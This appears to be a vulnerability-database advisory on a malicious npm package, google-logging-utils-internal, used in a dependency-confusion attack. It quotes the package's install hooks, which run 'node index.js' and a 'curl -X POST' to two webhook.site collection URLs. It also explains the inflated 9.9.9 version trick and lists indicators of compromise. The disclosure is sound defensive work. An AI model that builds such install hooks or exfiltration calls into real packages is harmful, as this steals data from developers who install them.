VDB
GCVE-110-OSM-2026-5912
GCVE-110-OSM-2026-5912
Advisory PublishedCVSS 9.6/10
This package implements a classic dependency-confusion exfiltration attack. The postinstall script executes `curl -X POST -d` to two hardcoded webhook.site endpoints (https://webhook.site/d7a413ff-8c38-4276-a2f4-a5be943cdda7 and https://webhook.site/5eb35918-f014-45e8-a5c0-e2ac953b50df), which are attacker-controlled OAST collection points — data is exfiltrated on every install. The preinstall and install hooks additionally run `node index.js`, providing a secondary execution vector. The publisher frengki0707 already has three confirmed malicious packages in OSM (@frengki0707/google-cloud-clone, frank-bot-gogle-cloning, frank-research-poc-apple), and the inflated version 9.9.9 is a textbook dependency-confusion probe designed to outrank any internal package of the same name. The library facade (genkit-based Google Cloud telemetry) is a plausible lure to maximize install surface against Google Cloud SDK consumers.
ENTRY
package/lib/index.js (default-index: index.js)
- Install Hook Executes Local JS File in package.json: ""preinstall": "node index.js""
- Postinstall Script in package/package.json: ""postinstall": "curl -X POST -d \""
- Postinstall Script in package.json: ""postinstall": "sleep 10 && curl -X POST -d \""
DESTINATION
- webhookServices: https://webhook.site/d7a413ff-8c38-4276-a2f4-a5be943cdda7 (exfil, plaintext)
- webhookServices: https://webhook.site/5eb35918-f014-45e8-a5c0-e2ac953b50df (exfil, plaintext)
EXFIL
- OAST/Interactsh Exfiltration in package/package.json: "webhook.site"
- OAST/Interactsh Exfiltration in package.json: "webhook.site"
ADDITIONAL FINDINGS
- Publisher Has Other Malicious Packages
- Rapid Version Publishing
PAYLOAD FILES
package/package.json
INDICATORS (IOCs)
- urls: https://genkit.dev/docs/get-started/
- domains: genkit.dev, genkit.com
- emails: test@genkit.com
- payloadFileHash: b2b49d5f12940e10ce517841fa6119bd7e2dd5ecb6dd4d8f5f40337fc4e59d4e
Weaknesses (CWE)
CWE-506Embedded Malicious Code
Risk Scores
CVSS 3.1
9.6/10
Critical · CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Affected Products
| Vendor | Product | Versions | Platforms |
|---|---|---|---|
| unknown | google-logging-utils-internal | all (affected) | — |
Browse GCVE Records
73,443 records in the GCVE database · Updated July 18, 2026
No matching records found.
Explore Further
Investigate this vulnerability in the interactive console or download the raw GCVE record.